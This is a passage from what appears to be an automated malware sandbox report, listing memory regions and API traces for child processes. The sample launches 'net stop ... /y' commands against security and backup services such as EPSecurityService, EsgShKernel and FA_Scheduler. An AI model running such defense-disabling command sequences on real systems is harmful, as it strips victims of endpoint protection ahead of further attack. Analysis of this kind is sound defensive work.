"private_0x000007fffffde000" filename = "" Region: id = 5479 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 5480 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5481 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5501 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5502 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5503 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5504 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5505 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5506 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5507 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5508 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5509 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5510 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5511 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5512 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5513 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5514 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5515 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5516 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5517 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5518 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5519 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5520 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5521 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 518 os_tid = 0x12a4 [0092.555] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afa90 | out: lpSystemTimeAsFileTime=0x1afa90*(dwLowDateTime=0xec5741d0, dwHighDateTime=0x1d48689)) [0092.555] GetCurrentProcessId () returned 0x12a0 [0092.555] GetCurrentThreadId () returned 0x12a4 [0092.555] GetTickCount () returned 0x20f7a [0092.555] QueryPerformanceCounter (in: lpPerformanceCount=0x1afa98 | out: lpPerformanceCount=0x1afa98*=1813947300000) returned 1 [0092.557] GetModuleHandleW (lpModuleName=0x0) returned 0xff9d0000 [0092.557] __set_app_type (_Type=0x1) [0092.557] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9e9c9c) returned 0x0 [0092.557] __getmainargs (in: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788, _DoWildCard=0, _StartInfo=0xff9f479c | out: _Argc=0xff9f4780, _Argv=0xff9f4790, _Env=0xff9f4788) returned 0 [0092.557] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.557] GetConsoleOutputCP () returned 0x1b5 [0092.558] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff9fcec0 | out: lpCPInfo=0xff9fcec0) returned 1 [0092.558] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.560] sprintf_s (in: _DstBuf=0x1afa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0092.560] setlocale (category=0, locale=".437") returned="English_United States.437" [0092.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.562] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0092.562] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0092.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af7d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0092.562] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0092.562] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa28 | out: Buffer=0x1afa28*=0x364d60) returned 0x0 [0092.562] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa28 | out: Buffer=0x1afa28*=0x36c120) returned 0x0 [0092.562] _fileno (_File=0x7fefdba2a80) returned 0 [0092.562] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0092.563] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0092.563] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0092.563] _wcsicmp (_String1="config", _String2="stop") returned -16 [0092.563] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0092.563] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0092.563] _wcsicmp (_String1="file", _String2="stop") returned -13 [0092.563] _wcsicmp (_String1="files", _String2="stop") returned -13 [0092.563] _wcsicmp (_String1="group", _String2="stop") returned -12 [0092.563] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0092.563] _wcsicmp (_String1="help", _String2="stop") returned -11 [0092.563] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0092.563] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0092.563] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0092.563] _wcsicmp (_String1="session", _String2="stop") returned -15 [0092.563] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0092.563] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0092.563] _wcsicmp (_String1="share", _String2="stop") returned -12 [0092.563] _wcsicmp (_String1="start", _String2="stop") returned -14 [0092.563] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0092.563] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0092.563] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0092.563] _wcsicmp (_String1="accounts", _String2="EPSecurityService") returned -4 [0092.563] _wcsicmp (_String1="computer", _String2="EPSecurityService") returned -2 [0092.563] _wcsicmp (_String1="config", _String2="EPSecurityService") returned -2 [0092.563] _wcsicmp (_String1="continue", _String2="EPSecurityService") returned -2 [0092.564] _wcsicmp (_String1="cont", _String2="EPSecurityService") returned -2 [0092.564] _wcsicmp (_String1="file", _String2="EPSecurityService") returned 1 [0092.564] _wcsicmp (_String1="files", _String2="EPSecurityService") returned 1 [0092.564] _wcsicmp (_String1="group", _String2="EPSecurityService") returned 2 [0092.564] _wcsicmp (_String1="groups", _String2="EPSecurityService") returned 2 [0092.564] _wcsicmp (_String1="help", _String2="EPSecurityService") returned 3 [0092.564] _wcsicmp (_String1="helpmsg", _String2="EPSecurityService") returned 3 [0092.564] _wcsicmp (_String1="localgroup", _String2="EPSecurityService") returned 7 [0092.564] _wcsicmp (_String1="pause", _String2="EPSecurityService") returned 11 [0092.564] _wcsicmp (_String1="session", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="sessions", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="sess", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="share", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="start", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="stats", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="statistics", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="stop", _String2="EPSecurityService") returned 14 [0092.564] _wcsicmp (_String1="time", _String2="EPSecurityService") returned 15 [0092.564] _wcsicmp (_String1="user", _String2="EPSecurityService") returned 16 [0092.564] _wcsicmp (_String1="users", _String2="EPSecurityService") returned 16 [0092.564] _wcsicmp (_String1="msg", _String2="EPSecurityService") returned 8 [0092.564] _wcsicmp (_String1="messenger", _String2="EPSecurityService") returned 8 [0092.564] _wcsicmp (_String1="receiver", _String2="EPSecurityService") returned 13 [0092.564] _wcsicmp (_String1="rcv", _String2="EPSecurityService") returned 13 [0092.564] _wcsicmp (_String1="netpopup", _String2="EPSecurityService") returned 9 [0092.564] _wcsicmp (_String1="redirector", _String2="EPSecurityService") returned 13 [0092.564] _wcsicmp (_String1="redir", _String2="EPSecurityService") returned 13 [0092.564] _wcsicmp (_String1="rdr", _String2="EPSecurityService") returned 13 [0092.564] _wcsicmp (_String1="workstation", _String2="EPSecurityService") returned 18 [0092.564] _wcsicmp (_String1="work", _String2="EPSecurityService") returned 18 [0092.565] _wcsicmp (_String1="wksta", _String2="EPSecurityService") returned 18 [0092.565] _wcsicmp (_String1="prdr", _String2="EPSecurityService") returned 11 [0092.565] _wcsicmp (_String1="devrdr", _String2="EPSecurityService") returned -1 [0092.565] _wcsicmp (_String1="lanmanworkstation", _String2="EPSecurityService") returned 7 [0092.565] _wcsicmp (_String1="server", _String2="EPSecurityService") returned 14 [0092.565] _wcsicmp (_String1="svr", _String2="EPSecurityService") returned 14 [0092.565] _wcsicmp (_String1="srv", _String2="EPSecurityService") returned 14 [0092.565] _wcsicmp (_String1="lanmanserver", _String2="EPSecurityService") returned 7 [0092.565] _wcsicmp (_String1="alerter", _String2="EPSecurityService") returned -4 [0092.565] _wcsicmp (_String1="netlogon", _String2="EPSecurityService") returned 9 [0092.565] _wcsupr (in: _String="EPSecurityService" | out: _String="EPSECURITYSERVICE") returned="EPSECURITYSERVICE" [0092.565] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x36ce30 [0092.848] GetServiceKeyNameW (in: hSCManager=0x36ce30, lpDisplayName="EPSECURITYSERVICE", lpServiceName=0xff9f5750, lpcchBuffer=0x1af948 | out: lpServiceName="", lpcchBuffer=0x1af948) returned 0 [0092.849] _wcsicmp (_String1="msg", _String2="EPSECURITYSERVICE") returned 8 [0092.849] _wcsicmp (_String1="messenger", _String2="EPSECURITYSERVICE") returned 8 [0092.849] _wcsicmp (_String1="receiver", _String2="EPSECURITYSERVICE") returned 13 [0092.849] _wcsicmp (_String1="rcv", _String2="EPSECURITYSERVICE") returned 13 [0092.849] _wcsicmp (_String1="redirector", _String2="EPSECURITYSERVICE") returned 13 [0092.849] _wcsicmp (_String1="redir", _String2="EPSECURITYSERVICE") returned 13 [0092.849] _wcsicmp (_String1="rdr", _String2="EPSECURITYSERVICE") returned 13 [0092.849] _wcsicmp (_String1="workstation", _String2="EPSECURITYSERVICE") returned 18 [0092.849] _wcsicmp (_String1="work", _String2="EPSECURITYSERVICE") returned 18 [0092.849] _wcsicmp (_String1="wksta", _String2="EPSECURITYSERVICE") returned 18 [0092.849] _wcsicmp (_String1="prdr", _String2="EPSECURITYSERVICE") returned 11 [0092.849] _wcsicmp (_String1="devrdr", _String2="EPSECURITYSERVICE") returned -1 [0092.849] _wcsicmp (_String1="lanmanworkstation", _String2="EPSECURITYSERVICE") returned 7 [0092.850] _wcsicmp (_String1="server", _String2="EPSECURITYSERVICE") returned 14 [0092.850] _wcsicmp (_String1="svr", _String2="EPSECURITYSERVICE") returned 14 [0092.850] _wcsicmp (_String1="srv", _String2="EPSECURITYSERVICE") returned 14 [0092.850] _wcsicmp (_String1="lanmanserver", _String2="EPSECURITYSERVICE") returned 7 [0092.850] _wcsicmp (_String1="alerter", _String2="EPSECURITYSERVICE") returned -4 [0092.850] _wcsicmp (_String1="netlogon", _String2="EPSECURITYSERVICE") returned 9 [0092.850] NetServiceControl (in: servername=0x0, service="EPSECURITYSERVICE", opcode=0x0, arg=0x0, bufptr=0x1af950 | out: bufptr=0x1af950) returned 0x889 [0092.850] wcscpy_s (in: _Destination=0xff9f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0092.850] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0092.852] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0092.853] GetFileType (hFile=0xb) returned 0x2 [0092.853] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0092.854] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x1af810*=0x1e) returned 1 [0092.854] GetFileType (hFile=0xb) returned 0x2 [0092.854] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0092.854] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x1af810*=0x2) returned 1 [0092.854] _ultow (in: _Dest=0x889, _Radix=1767552 | out: _Dest=0x889) returned="2185" [0092.854] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff9f5b50, nSize=0x800, Arguments=0xff9f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0092.855] GetFileType (hFile=0xb) returned 0x2 [0092.855] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0092.855] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff9f5b50*, lpNumberOfCharsWritten=0x1af810*=0x34) returned 1 [0092.855] GetFileType (hFile=0xb) returned 0x2 [0092.855] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af818 | out: lpMode=0x1af818) returned 1 [0092.855] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff9d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af810, lpReserved=0x0 | out: lpBuffer=0xff9d1efc*, lpNumberOfCharsWritten=0x1af810*=0x2) returned 1 [0092.856] NetApiBufferFree (Buffer=0x364d60) returned 0x0 [0092.856] NetApiBufferFree (Buffer=0x36c120) returned 0x0 [0092.856] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPSecurityService /y" [0092.856] exit (_Code=2) Process: id = "114" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x66dd3000" os_pid = "0x12b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5482 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5483 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5484 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5485 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5486 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5487 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5488 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5489 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5490 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5491 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5492 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5493 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5494 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 5495 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5496 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 519 os_tid = 0x12b4 Process: id = "115" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x658f2000" os_pid = "0x12d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5522 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5523 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5524 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5525 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5526 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5527 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5528 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5529 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5530 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5531 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5532 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5533 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5534 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 5535 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5536 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 521 os_tid = 0x12d4 Process: id = "116" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6134f000" os_pid = "0x1374" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "112" os_parent_pid = "0x1290" cmd_line = "C:\\Windows\\system32\\net1 stop EraserSvc11710 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5557 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5558 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5559 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5560 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5561 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5562 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5563 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5564 start_va = 0xff8d0000 end_va = 0xff902fff entry_point = 0xff8d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5565 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5566 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5567 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5568 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5569 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5570 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5571 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5572 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5573 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5574 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5575 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5576 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5577 start_va = 0x7efe0000 end_va = 